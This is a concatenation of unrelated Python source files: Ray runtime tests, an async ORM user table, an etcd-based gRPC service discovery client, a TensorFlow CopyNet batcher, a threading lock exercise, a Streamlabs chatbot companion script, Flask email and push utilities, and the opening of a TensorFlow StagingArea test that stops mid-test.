assert function_table_entry["Module"] == "runtest"
assert task_table[task_id] == ray.global_state.task_table(task_id)
# Wait for two objects, one for the x_id and one for result_id.
wait_for_num_objects(2)
def wait_for_object_table():
timeout = 10
start_time = time.time()
while time.time() - start_time < timeout:
object_table = ray.global_state.object_table()
tables_ready = (object_table[x_id]["ManagerIDs"] is not None and
object_table[result_id]["ManagerIDs"] is not None)
if tables_ready:
return
time.sleep(0.1)
raise Exception("Timed out while waiting for object table to "
"update.")
object_table = ray.global_state.object_table()
assert len(object_table) == 2
assert object_table[x_id]["IsEviction"][0] is False
assert object_table[result_id]["IsEviction"][0] is False
assert object_table[x_id] == ray.global_state.object_table(x_id)
object_table_entry = ray.global_state.object_table(result_id)
assert object_table[result_id] == object_table_entry
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_log_file_api(shutdown_only):
ray.init(num_cpus=1, redirect_worker_output=True)
message = "unique message"
@ray.remote
def f():
logger.info(message)
# The call to sys.stdout.flush() seems to be necessary when using
# the system Python 2.7 on Ubuntu.
sys.stdout.flush()
ray.get(f.remote())
# Make sure that the message appears in the log files.
start_time = time.time()
found_message = False
while time.time() - start_time < 10:
log_files = ray.global_state.log_files()
for ip, innerdict in log_files.items():
for filename, contents in innerdict.items():
contents_str = "".join(contents)
if message in contents_str:
found_message = True
if found_message:
break
time.sleep(0.1)
assert found_message is True
@pytest.mark.skipif(
os.environ.get("RAY_USE_NEW_GCS") == "on",
reason="New GCS API doesn't have a Python API yet.")
def test_workers(shutdown_only):
num_workers = 3
ray.init(redirect_worker_output=True, num_cpus=num_workers)
@ray.remote
def f():
return id(ray.worker.global_worker), os.getpid()
# Wait until all of the workers have started.
worker_ids = set()
while len(worker_ids) != num_workers:
worker_ids = set(ray.get([f.remote() for _ in range(10)]))
worker_info = ray.global_state.workers()
assert len(worker_info) >= num_workers
for worker_id, info in worker_info.items():
assert "node_ip_address" in info
assert "plasma_store_socket" in info
assert "stderr_file" in info
assert "stdout_file" in info
def test_specific_driver_id():
dummy_driver_id = ray.ObjectID(b"00112233445566778899")
ray.init(driver_id=dummy_driver_id)
@ray.remote
def f():
return ray.worker.global_worker.task_driver_id.id()
assert_equal(dummy_driver_id.id(), ray.worker.global_worker.worker_id)
task_driver_id = ray.get(f.remote())
assert_equal(dummy_driver_id.id(), task_driver_id)
ray.shutdown()
@pytest.fixture
def shutdown_only_with_initialization_check():
yield None
# The code after the yield will run as teardown code.
ray.shutdown()
assert not ray.is_initialized()
def test_initialized(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0)
assert ray.is_initialized()
def test_initialized_local_mode(shutdown_only_with_initialization_check):
assert not ray.is_initialized()
ray.init(num_cpus=0, local_mode=True)
assert ray.is_initialized()
def test_wait_reconstruction(shutdown_only):
ray.init(num_cpus=1, object_store_memory=10**8)
@ray.remote
def f():
return np.zeros(6 * 10**7, dtype=np.uint8)
x_id = f.remote()
ray.wait([x_id])
ray.wait([f.remote()])
assert not ray.worker.global_worker.plasma_client.contains(
ray.pyarrow.plasma.ObjectID(x_id.id()))
ready_ids, _ = ray.wait([x_id])
assert len(ready_ids) == 1
def test_ray_setproctitle(shutdown_only):
ray.init(num_cpus=2)
@ray.remote
class UniqueName(object):
def __init__(self):
assert setproctitle.getproctitle() == "ray_UniqueName:__init__()"
def f(self):
assert setproctitle.getproctitle() == "ray_UniqueName:f()"
@ray.remote
def unique_1():
assert setproctitle.getproctitle() == "ray_worker:runtest.unique_1()"
actor = UniqueName.remote()
ray.get(actor.f.remote())
ray.get(unique_1.remote())
def test_duplicate_error_messages(shutdown_only):
ray.init(num_cpus=0)
driver_id = ray.ray_constants.NIL_JOB_ID.id()
error_data = ray.gcs_utils.construct_error_message(driver_id, "test",
"message", 0)
# Push the same message to the GCS twice (they are the same because we
# do not include a timestamp).
r = ray.worker.global_worker.redis_client
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
# Before https://github.com/ray-project/ray/pull/3316 this would
# give an error
r.execute_command("RAY.TABLE_APPEND", ray.gcs_utils.TablePrefix.ERROR_INFO,
ray.gcs_utils.TablePubsub.ERROR_INFO, driver_id,
error_data)
@pytest.mark.skipif(
os.getenv("TRAVIS") is None,
reason="This test should only be run on Travis.")
def test_ray_stack(shutdown_only):
ray.init(num_cpus=2)
def unique_name_1():
time.sleep(1000)
@ray.remote
def unique_name_2():
time.sleep(1000)
@ray.remote
def unique_name_3():
unique_name_1()
unique_name_2.remote()
unique_name_3.remote()
success = False
start_time = time.time()
while time.time() - start_time < 30:
# Attempt to parse the "ray stack" call.
output = ray.utils.decode(subprocess.check_output(["ray", "stack"]))
if ("unique_name_1" in output and "unique_name_2" in output
and "unique_name_3" in output):
success = True
break
if not success:
raise Exception("Failed to find necessary information with "
"'ray stack'")
|
database.py
|
import asyncio
import json
import os
import threading
import databases
import orm
import sqlalchemy
from functools import partial
from orm import Model, JSON, DateTime, Integer, String
from sqlalchemy.sql import func
from sqlalchemy.orm import sessionmaker
database = databases.Database(os.getenv('DATABASE_URL'))
metadata = sqlalchemy.MetaData()
class Users(Model):
__tablename__ = 'users'
__database__ = database
__metadata__ = metadata
key = Integer(primary_key=True)
id = Integer()
start_date = DateTime(default=func.now())
waiting_for = String(max_length=50, allow_null=True)
waiting_param = String(max_length=200, allow_null=True)
language = String(max_length=10, default='en')
timezone = String(max_length=100, default='UTC')
async def wait_for(self, waiting_for, waiting_param=None):
return await self.update(waiting_for=waiting_for, waiting_param=waiting_param)
async def wait_end(self):
return await self.update(waiting_for=None, waiting_param=None)
engine = sqlalchemy.create_engine(str(database.url))
metadata.create_all(engine, checkfirst=True)
Session = sessionmaker(bind=engine)
session = Session()
async def create_db():
return await database.connect()
# Need to run asyncio.run_coroutine_threadsafe with a loop in another thread. Otherwise this block will get stuck forever.
# I create a new loop to be able to use run_forever() and then stop() without affecting our main loop
loop = asyncio.get_event_loop()
threading.Thread(target=partial(asyncio.run_coroutine_threadsafe, create_db(), loop), daemon=True).start()
|
client_discovery.py
|
import json
import logging
import threading
from functools import wraps
import grpc
from etcd3.events import PutEvent, DeleteEvent
from grpc_microservice.common.client import header_manipulator_client_interceptor
from grpc_microservice.common.exceptions import NoServerNodeException
from grpc_microservice.common.meta_cls import Singleton, time_this
from grpc_microservice.etcd_minoter.client.load_balance import LeastActiveLoadBalance, RandomLoadBalance
from grpc_microservice.etcd_minoter.etcd_manager import EtcdServer
def choose_address(server_name, **kwargs):
"""
选择所连接的服务地址 这里预留接口
"""
return ServerDiscovery().choice_grpc_server(server_name, **kwargs)
def proxy_grpc_func(stub, module_name):
_stub = stub
_module_name = module_name
def decorate(func):
@time_this
@wraps(func)
def wrapper(*args, **kwargs):
_func = func.__name__
_point, _token = choose_address('/{}/{}'.format(_module_name, _func), **kwargs)
#
header_adder_interceptor = header_manipulator_client_interceptor.server_access_interceptor(_token)
with grpc.insecure_channel(_point) as channel:
intercept_channel = grpc.intercept_channel(channel, header_adder_interceptor)
__stub = _stub(intercept_channel)
_func_stub = getattr(__stub, _func)
ret = _func_stub(args[1])
return ret
return wrapper
return decorate
class ServerDiscovery(EtcdServer, metaclass=Singleton):
log = logging.getLogger(__name__)
def __init__(self, balance_strategy=None, logger=None):
super().__init__(logger)
if balance_strategy == "LeastActiveLoadBalance":
self.balance_strategy = LeastActiveLoadBalance()
else:
self.balance_strategy = RandomLoadBalance()
self.server_colletion = {}
self.logger = logger or self.log
self.pro = True # debug False
def set_balance_strategy(self, balance_strategy):
if balance_strategy == "LeastActiveLoadBalance":
self.balance_strategy = LeastActiveLoadBalance()
else:
self.balance_strategy = RandomLoadBalance()
def start(self, read_once=False):
"""开始服务调用接口"""
self.read_servers()
self.logger.info("etcd_minoter 注册中心启动成功")
if not read_once:
t = threading.Thread(target=self.loop, name='LoopThread')
t.start()
def delete_filter(self, _server_name, _server_uuid):
if self.server_colletion.get('{}/{}'.format(_server_name, _server_uuid), None):
self.server_colletion.pop('{}/{}'.format(_server_name, _server_uuid))
_tmp_force_server = self.__force_server.get(_server_name, [])
if _server_uuid in _tmp_force_server:
_tmp_force_server.remove(_server_uuid)
if len(_tmp_force_server) == 0:
if self.__force_server.get(_server_name, None):
self.__force_server.pop(_server_name)
else:
self.__force_server[_server_name] = _tmp_force_server
_tmp_normal_server = self.__normal_server.get(_server_name, [])
if _server_uuid in _tmp_normal_server:
_tmp_normal_server.remove(_server_uuid)
if len(_tmp_normal_server) == 0:
if self.__normal_server.get(_server_name, None):
self.__normal_server.pop(_server_name)
else:
self.__normal_server[_server_name] = _tmp_normal_server
def loop(self):
# 进行监听
events_iterator, cancel = self.etcd_client.watch_prefix(self.ROOT)
for event in events_iterator:
self.logger.info("刷新服务开始")
if isinstance(event, PutEvent):
_server_uuid, _server_name, _server_info = self.__read_node(event.key, event.value)
# 如果只刷新active_index 择刷新 否则重新添加并转化
_key = '{}/{}'.format(_server_name, _server_uuid)
old = self.server_colletion.get(_key, None)
if old:
if old['pro'] == _server_info['pro'] and old['force'] == _server_info['force'] and old['weight'] == \
_server_info['weight'] and old['offline'] == _server_info['offline'] and old['ip'] == \
_server_info['ip'] and old['port'] == _server_info['port']:
# 刷新index
self.server_colletion[_key]['active_index'] = _server_info['active_index']
print('刷新index ')
continue
print('节点更新 重置操作')
self.delete_filter(_server_name, _server_uuid)
# 可能是新增 ,可能是修改 默认覆盖
self.server_colletion['{}/{}'.format(_server_name, _server_uuid)] = _server_info
self.tran_s_once(_key, _server_info)
# 默认新增
elif isinstance(event, DeleteEvent):
_server_uuid, _server_name, _ = self.__read_node(event.key, event.value)
self.delete_filter(_server_name, _server_uuid)
print(self.server_colletion)
def tran_s_once(self, _server_name_uuid, _server_info):
_server_name = "/".join(_server_name_uuid.split('/')[:-1])
# 过滤下线接口
if _server_info['pro'] != self.pro or _server_info['offline']:
return
# 如果有强制调用的接口
if _server_info['force']:
_force_server = self.__force_server.get(_server_name, [])
_force_server.append(_server_info['uuid'])
self.__force_server[_server_name] = _force_server
_normal_server = self.__normal_server.get(_server_name, [])
_normal_server.append(_server_info['uuid'])
self.__normal_server[_server_name] = _normal_server
def tran_s(self):
self.__normal_server = {}
self.__force_server = {}
_server_colletion = self.server_colletion
for _uuid, _server_info in _server_colletion.items():
self.tran_s_once(_uuid, _server_info)
def filter_foce(self, server_name):
server_pool = self.__force_server.get(server_name, None)
if server_pool and len(server_pool) > 0:
return server_pool
server_pool = self.__normal_server.get(server_name, None)
if server_pool and len(server_pool) > 0:
return server_pool
raise NoServerNodeException('no server can user')
def __read_node(self, path, value):
_v = value.decode("utf-8")
_path = path.decode("utf-8").replace('/GRPC', '').split('/')
_module = _path[1]
_api = _path[2]
_server_uuid = _path[3]
_server_info = json.loads(_v, encoding='utf-8')
_server_name = '/{}/{}'.format(_module, _api)
return _server_uuid, _server_name, _server_info
def read_servers(self):
"""获取服务列表"""
self.server_colletion = {}
childrens = self.etcd_client.get_prefix(self.ROOT)
for value, _meta in childrens:
_uuid, _server_name, _server_info = self.__read_node(_meta.key, value)
self.server_colletion['{}/{}'.format(_server_name, _uuid)] = _server_info
def get_point(self, server_name, server_key):
server_node = self.server_colletion[server_name + '/' + server_key['uuid']]
return ":".join([server_node['ip'], server_node['port']]), server_node['uuid']
def choice_grpc_server(self, server_name, **kwargs):
# 根据相应负载策略进行筛选
uuids = self.filter_foce(server_name)
server_invokers = []
for _key in uuids:
server_invokers.append(self.server_colletion['{}/{}'.format(server_name, _key)])
return self.get_point(server_name, self.balance_strategy.choice(server_invokers, **kwargs))
def designation_point(self, ):
"""
# TODO 指定服务端点调用
指定服务端点
"""
# 测试环境分为是否需要验证
# force 被强制调用,选项 IP:port / uuid
pass
# 生产环境只开放生产环境的服务 offline
# 如果无 唯一调用 选择时 根据规则 权重 进行分配 否则选择强制调用
if __name__ == '__main__':
server_inspecte = ServerDiscovery(balance_strategy="LeastActiveLoadBalance")
server_inspecte.start()
server_inspecte.tran_s()
for x in range(50):
node_info = server_inspecte.choice_grpc_server('/RoomServer/CreateRoom')
print(node_info)
print("启动成功")
|
copynet_batcher.py
|
# Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Batch reader to sequence generation model, with bucketing support.
Continuously reads source and target from tf.Example file, batches the
sources and targets, and returns the batched inputs.
Example:
batcher = batch_reader.Batcher(...)
while True:
(...) = batcher.NextBatch()
"""
import collections
import queue
from random import random
from random import shuffle
from threading import Thread
import time
import numpy as np
import tensorflow as tf
import data
ModelInput = collections.namedtuple(
'ModelInput',
'enc_input dec_input dec_target_g dec_target_c enc_len dec_len '
'source targets')
BUCKET_CACHE_BATCH = 100
QUEUE_NUM_BATCH = 100
DAEMON_READER_THREADS = 16
BUCKETING_THREADS = 4
class Batcher(object):
"""Batch reader with shuffling and bucketing support."""
def __init__(self, data_path, config):
"""Batcher initializer.
Args:
data_path: tf.Example filepattern.
config: model hyperparameters.
"""
self._data_path = data_path
self._config = config
self._input_vocab = config.input_vocab
self._output_vocab = config.output_vocab
self._source_key = config.source_key
self._target_key = config.target_key
self.use_bucketing = config.use_bucketing
self._truncate_input = config.truncate_input
self._input_queue = queue.Queue(QUEUE_NUM_BATCH * config.batch_size)
self._bucket_input_queue = queue.Queue(QUEUE_NUM_BATCH)
self._input_threads = []
for _ in range(DAEMON_READER_THREADS):
self._input_threads.append(Thread(target=self._FillInputQueue))
self._input_threads[-1].daemon = True
self._input_threads[-1].start()
self._bucketing_threads = []
for _ in range(BUCKETING_THREADS):
self._bucketing_threads.append(Thread(target=self._FillBucketInputQueue))
self._bucketing_threads[-1].daemon = True
self._bucketing_threads[-1].start()
self._watch_thread = Thread(target=self._WatchThreads)
self._watch_thread.daemon = True
self._watch_thread.start()
def NextBatch(self):
"""Returns a batch of inputs for model.
Returns:
Tuple (enc_batch, dec_batch, target_gen_batch, target_cop_batch,
enc_input_len, dec_input_len,
loss_weights, origin_sources, origin_targets) where:
enc_batch: A batch of encoder inputs [batch_size, config.enc_timestamps].
dec_batch: A batch of decoder inputs [batch_size, config.dec_timestamps].
target_gen_batch: A batch of targets [batch_size, config.dec_timestamps].
target_cop_batch: A batch of targets [batch_size, config.dec_timestamps].
enc_input_len: Encoder input lengths of the batch.
dec_input_len: Decoder input lengths of the batch.
loss_weights: Weights for loss function, 1 if not padded, 0 if padded.
source: string. Original source words.
targets: List of strings. Original target words.
"""
enc_batch = np.zeros(
(self._config.batch_size, self._config.max_input_len), dtype=np.int32)
enc_input_lens = np.zeros((self._config.batch_size), dtype=np.int32)
dec_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
dec_output_lens = np.zeros((self._config.batch_size), dtype=np.int32)
target_gen_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
target_cop_batch = np.zeros(
(self._config.batch_size, self._config.max_output_len), dtype=np.int32)
loss_weights = np.zeros(
(self._config.batch_size, self._config.max_output_len),
dtype=np.float32)
source = ['None'] * self._config.batch_size
targets = [['None']] * self._config.batch_size
buckets = self._bucket_input_queue.get()
for i in range(self._config.batch_size):
(enc_inputs, dec_inputs, dec_targets_gen, dec_targets_cop, enc_input_len,
dec_output_len, source_i, targets_i) = buckets[i]
enc_input_lens[i] = enc_input_len
dec_output_lens[i] = dec_output_len
enc_batch[i, :] = enc_inputs[:]
dec_batch[i, :] = dec_inputs[:]
target_gen_batch[i, :] = dec_targets_gen[:]
target_cop_batch[i, :] = dec_targets_cop[:]
source[i] = source_i
targets[i] = targets_i
for j in range(dec_output_len):
loss_weights[i][j] = 1
return (enc_batch, dec_batch, target_gen_batch, target_cop_batch,
enc_input_lens, dec_output_lens, loss_weights, source, targets)
def _FillInputQueue(self):
"""Fills input queue with ModelInput."""
# input gets padded
pad_id = self._input_vocab.WordToId(data.PAD_TOKEN)
# output get start id and padded with end ids
end_id = self._output_vocab.WordToId(data.SENTENCE_END)
input_gen = self._TextGenerator(data.ExampleGen(self._data_path))
while True:
(source, targets) = next(input_gen)
# target = choice(targets)
target = targets[0]
# Convert sentences to word IDs, stripping existing <s> and </s>.
enc_inputs = data.GetWordIds(source, self._input_vocab)
dec_inputs_gen = data.GetWordIds(target, self._output_vocab)
dec_inputs_cop = data.GetWordIndices(
target, source, self._input_vocab, position_based_indexing=True)
# Filter out too-short input
if len(enc_inputs) < self._config.min_input_len:
tf.logging.warning('Drop an example - input to short: %d (min: %d)',
len(enc_inputs), self._config.min_input_len)
continue
if len(dec_inputs_gen) < self._config.min_input_len:
tf.logging.warning('Drop an example - output to short: %d (min: %d)',
len(enc_inputs), self._config.min_input_len)
continue
# If we're not truncating input, throw out too-long input
if not self._truncate_input:
if len(enc_inputs) > self._config.max_input_len:
tf.logging.warning('Drop an example - input to long: %d (max: %d)',
len(enc_inputs), self._config.max_input_len)
continue
if len(dec_inputs_gen) > self._config.max_output_len:
tf.logging.warning('Drop an example - output to long: %d (max: %d)',
len(dec_inputs_gen), self._config.max_output_len)
continue
# If we are truncating input, do so if necessary
else:
if len(enc_inputs) > self._config.max_input_len:
enc_inputs = enc_inputs[:self._config.max_input_len]
dec_inputs_cop = [
pos if pos <= self._config.max_input_len else 0
for pos in dec_inputs_cop
]
if len(dec_inputs_gen) > self._config.max_output_len:
dec_inputs_gen = dec_inputs_gen[:self._config.max_output_len]
dec_inputs_cop = dec_inputs_cop[:self._config.max_output_len]
# dec_targets_gen is dec_inputs without <s> at beginning, plus </s> at end
dec_targets_gen = dec_inputs_gen[1:]
dec_targets_gen.append(end_id)
# dec_targets_gen is dec_inputs without <s> at beginning, plus </s> at end
dec_targets_cop = dec_inputs_cop[1:]
end_position = len(enc_inputs)
dec_targets_cop.append(end_position)
enc_input_len = len(enc_inputs)
dec_output_len = len(dec_targets_gen) # is equal to len(dec_targets_cop)
# Pad if necessary
while len(enc_inputs) < self._config.max_input_len:
enc_inputs.append(pad_id)
while len(dec_inputs_gen) < self._config.max_output_len:
dec_inputs_gen.append(end_id)
while len(dec_targets_gen) < self._config.max_output_len:
dec_targets_gen.append(end_id)
while len(dec_targets_cop) < self._config.max_output_len:
dec_targets_cop.append(end_position)
element = ModelInput(enc_inputs, dec_inputs_gen, dec_targets_gen,
dec_targets_cop, enc_input_len, dec_output_len,
source, targets)
self._input_queue.put(element)
def _FillBucketInputQueue(self):
"""Fills bucketed batches into the bucket_input_queue."""
while True:
inputs = []
for _ in range(self._config.batch_size * BUCKET_CACHE_BATCH):
inputs.append(self._input_queue.get())
if self.use_bucketing:
inputs = sorted(inputs, key=lambda inp: inp.enc_len)
batches = []
for i in range(0, len(inputs), self._config.batch_size):
batches.append(inputs[i:i + self._config.batch_size])
shuffle(batches)
for b in batches:
self._bucket_input_queue.put(b)
def _WatchThreads(self):
"""Watches the daemon input threads and restarts if dead."""
while True:
time.sleep(60)
input_threads = []
for t in self._input_threads:
if t.is_alive():
input_threads.append(t)
else:
tf.logging.error('Found input thread dead.')
new_t = Thread(target=self._FillInputQueue)
input_threads.append(new_t)
input_threads[-1].daemon = True
input_threads[-1].start()
self._input_threads = input_threads
bucketing_threads = []
for t in self._bucketing_threads:
if t.is_alive():
bucketing_threads.append(t)
else:
tf.logging.error('Found bucketing thread dead.')
new_t = Thread(target=self._FillBucketInputQueue)
bucketing_threads.append(new_t)
bucketing_threads[-1].daemon = True
bucketing_threads[-1].start()
self._bucketing_threads = bucketing_threads
def _TextGenerator(self, example_gen):
"""Generates source and target text from tf.Example.
Args:
example_gen: ExampleGen that yields tf.Example.
Yields:
Tuple (source_text, target_text) where:
source_text: Text source string.
target_texts: Text targets (well-formed) string.
"""
while True:
example = next(example_gen)
try:
# TARGET
all_target_texts = []
if len(self._target_key.split(',')) > 1:
all_target_text = ''
counter = -1
# concat different keys (not combinable with multiple targets)
for key in self._target_key.split(','):
if counter >= 0:
all_target_text += ' '
all_target_text += self._GetExFeatureText(example, key)[0].strip()
counter += 1
all_target_text = self._AddSentenceBoundary(all_target_text)
all_target_texts.append(all_target_text)
else:
key = self._target_key
for target_text in self._GetExFeatureText(example, key):
target_text = target_text.strip()
target_text = self._AddSentenceBoundary(target_text)
all_target_texts.append(target_text)
# SOURCE
all_source_text = ''
counter = -1
# if input is list of keys we concat them using separator tokens.
for key in self._source_key.split(','):
if counter >= 0:
# <sep_0>, etc. must already be part of the vocab
if self._input_vocab.WordToId('<sep_' + str(counter) + '>') <= 0:
tf.logging.error('Separator token missing: <sep_%s>',
str(counter))
all_source_text += ' <sep_' + str(counter) + '> '
# sepcial key to add the length of the output to the input
if key == '%LENGTH%':
all_source_text += str(len(all_target_texts[0].split()))
elif len(key.split('%')) == 2:
if random() < float(key.split('%')[0]) / 100:
all_source_text += self._GetExFeatureText(
example, key.split('%')[1])[0].strip()
else:
all_source_text += ' <no_callout> '
else:
all_source_text += self._GetExFeatureText(example, key)[0].strip()
counter += 1
all_source_text = self._AddSentenceBoundary(all_source_text)
yield (all_source_text, all_target_texts)
except ValueError as e:
tf.logging.error(e)
tf.logging.error('Failed to get article or abstract from example')
continue
def _AddSentenceBoundary(self, text):
"""Pads text with start end end of sentence token iff needed.
Args:
text: text to be padded.
Returns:
A text with start and end tokens.
"""
if not text.startswith(data.SENTENCE_START):
text = data.SENTENCE_START + ' ' + text
if not text.endswith(data.SENTENCE_END):
text = text + ' ' + data.SENTENCE_END
return text
def _GetExFeatureText(self, example, key):
"""Extracts text for a feature from tf.Example.
Args:
example: tf.Example.
key: Key of the feature to be extracted.
Returns:
A feature text extracted.
"""
values = []
for value in example.features.feature[key].bytes_list.value:
values.append(value.decode("utf-8"))
return values
|
Chap10_Example10.32.py
|
from threading import *
class abc:
def __init__(self, seat_available):
self.seat_available = seat_available
self.mylock = Lock()
def abc_reserveseat(self, seat_required):
self.mylock.acquire()
print("Number of seats remaining : ", self.seat_available)
if self.seat_available >= seat_required:
print(f"{current_thread().name} was alloted the seat No. L{self.seat_available}")
self.seat_available = self.seat_available - 1
else:
print("All the seats are booked now Sorry !")
self.mylock.release()
obj_abc = abc(2)
myt1 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Saurabh')
myt2 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Nilesh')
myt3 = Thread(target=obj_abc.abc_reserveseat, args=(1,), name='Divya')
myt1.start()
myt2.start()
myt3.start()
print("Main Thread")
|
Quizzical_StreamlabsSystem.py
|
# ---------------------------------------
# Import Libraries
# ---------------------------------------
import sys
import clr
clr.AddReference("IronPython.SQLite.dll")
clr.AddReference("IronPython.Modules.dll")
import os
from threading import Thread, Event
from json import loads
from Queue import Queue
import traceback
sys.path.append(os.path.join(os.path.dirname(__file__), 'lib'))
# noinspection PyUnresolvedReferences
from quizzical_server import start_http_server
# ---------------------------------------
# [Required] Script Information
# ---------------------------------------
ScriptName = 'Quizzical'
Website = 'github.com/NatKarmios/Quizzical'
Description = 'A companion script to help Quizzical integrate with the StreamLabs Bot currency system.'
Creator = 'Nat Karmios'
Version = '1.0.0'
# ---------------------------------------
# Set Variables
# ---------------------------------------
HOST = '127.0.0.1'
PORT = 23120
enabled = True
logQueue = Queue()
add_points_event = Event()
add_points_event.set()
add_points_data = {}
add_points_reply = []
# ---------------------------------------
# [Required] Initialize Data (Only called on Load)
# ---------------------------------------
def Init():
Thread(target=start_server).start()
log('Quizzical companion script, locked and loaded!')
# ---------------------------------------
# [Required] Execute Data / Process Messages
# ---------------------------------------
def Execute(_):
# This plugin has no need for Execute() to be called.
pass
# ---------------------------------------
# [Required] Tick Function
# ---------------------------------------
def Tick():
global add_points_event
global add_points_data
global add_points_reply
if not add_points_event.is_set():
add_points_reply = list(Parent.AddPointsAll(add_points_data))
log('%s users credited by Quizzical' % (len(add_points_data) - len(add_points_reply)))
add_points_event.set()
while not logQueue.empty():
Parent.Log('Quizzical', logQueue.get())
def Unload():
pass
def ScriptToggled(state):
global enabled
enabled = state
def log(msg):
logQueue.put(msg)
def handle_add_points_request(raw_data, request_handler):
global add_points_data
global add_points_event
global add_points_reply
if not enabled:
request_handler.reply({
'success': False,
'message': 'The Quizzical companion script is disabled!'
})
return
try:
# Throws if the post data fails to parse from JSON
try:
data = loads(raw_data)
except:
raise ValueError
# This checks that:
# 1. the data is a dictionary
# 2. the data contains the 'amount' attribute
# 3. the 'amount' attribute is an integer
# 4. the data contains the 'users' attribute
# 5. the 'users' attribute is a list
# 6. each value of the 'users' list attribute is a string
if not isinstance(data, dict) \
or 'amount' not in data \
or not isinstance(data['amount'], int) \
or 'users' not in data \
or not isinstance(data['users'], list) \
or any(map(lambda user: not isinstance(user, (str, unicode)), data['users'])):
raise ValueError
amount = data['amount']
users = data['users']
add_points_data = dict(map(lambda user: (user.lower(), amount), users))
add_points_event.clear()
add_points_event.wait()
try:
reply_data = {
'success': True,
'message': '%s/%s users credited.' % (len(users) - len(add_points_reply), len(users)),
'failedToAdd': add_points_reply
}
request_handler.reply(reply_data)
except:
log(traceback.format_exc())
except ValueError:
request_handler.reply({'success': False, 'msg': 'Malformed request'}, response_code=400)
def handle_ping():
log('Pinged by (probably) Quizzical!')
def start_server():
start_http_server(handle_add_points_request, handle_ping)
Init()
|
util.py
|
from app import app, mail
from app.oauth import require_oauth
from app.models import User
from flask import render_template, url_for, abort, current_app, make_response
from flask_mail import Message
import functools
from authlib.flask.oauth2 import current_token
from authlib.specs.rfc6749 import OAuth2Error
from threading import Thread
from datetime import datetime, timedelta
from app import push
from apns2.payload import Payload
from apns2.errors import BadDeviceToken, Unregistered
def asynchronous(f):
def wrapper(*args, **kwargs):
thr = Thread(target=f, args=args, kwargs=kwargs)
thr.start()
return wrapper
@asynchronous
def send_email(app, to, subject, template):
with app.app_context():
msg = Message(subject, recipients=[to], html=template)
mail.send(msg)
def verify_url_token(token):
user = User.query.filter_by(url_token=token).first()
if not user:
return None
expiration = int(app.config['URL_TOKEN_EXPIRATION'])
if user.url_token_timestamp < datetime.utcnow() - timedelta(seconds=expiration):
return None
return user
def send_verification_email(user, url):
token = user.generate_url_token()
verify_url = url_for('.mail_verification', token=token, _external=url)
html = render_template('mail_verification_mail.html', url=verify_url, username=user.username)
send_email(current_app._get_current_object(), user.email, 'メールアドレス確認', html)
return verify_url
def send_password_reset_email(user, url):
token = user.generate_url_token()
reset_url = url_for('.password_reset', token=token, _external=url)
html = render_template('password_reset_mail.html', url=reset_url, username=user.username)
send_email(current_app._get_current_object(), user.email, 'パスワードリセットを受け付けました', html)
return reset_url
def send_pwreset_no_user_found_email(email):
html = render_template('pwreset_no_user_found.html')
send_email(current_app._get_current_object(), email, f'{app.config["APP_NAME"]} パスワードリセット', html)
def notify(user, alert, custom=None):
notify_to_ios(user, alert, custom)
notify_to_android(user, alert, custom)
def notify_to_ios(user, alert, custom):
tokens = [ios_device_token
for ios_device_token in user.ios_device_tokens
if ios_device_token.value and not ios_device_token.is_revoked]
topic = 'Yuma.book-sns-app'
payload = Payload(alert=alert, sound="default", custom=custom)
for token in tokens:
try:
push.send_notification(token.value, payload, topic)
except BadDeviceToken:
token.revoke()
except Unregistered:
print('Device token unregistered')
def notify_to_android(user, alert, custom):
pass
def require_oauth_and_user_activation(scope=None):
"""Extends 'require_oauth' with checking if user.is_active."""
def wrapper(f):
@functools.wraps(f)
def decorated(*args, **kwargs):
try:
require_oauth.acquire_token(scope)
except OAuth2Error as error:
abort(401)
if not current_token.user.is_active:
abort(401)
return f(*args, **kwargs)
return decorated
return wrapper
def render_template_rest(template, status_code=200, **kwargs):
return make_response(render_template(template, **kwargs), status_code, {'Content-Type': 'text/html'})
|
stage_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
TIMEOUT = 1
class StageTest(test.TestCase):
def testSimple(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.float32])
stage = stager.put([v])
y = stager.get()
y = math_ops.reduce_max(math_ops.matmul(y, y))
G.finalize()
with self.test_session(use_gpu=True, graph=G) as sess:
sess.run(stage, feed_dict={x: -1})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i})
self.assertAllClose(4 * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testMultiple(self):
with ops.Graph().as_default() as G:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.StagingArea([dtypes.float32, dtypes.float32])
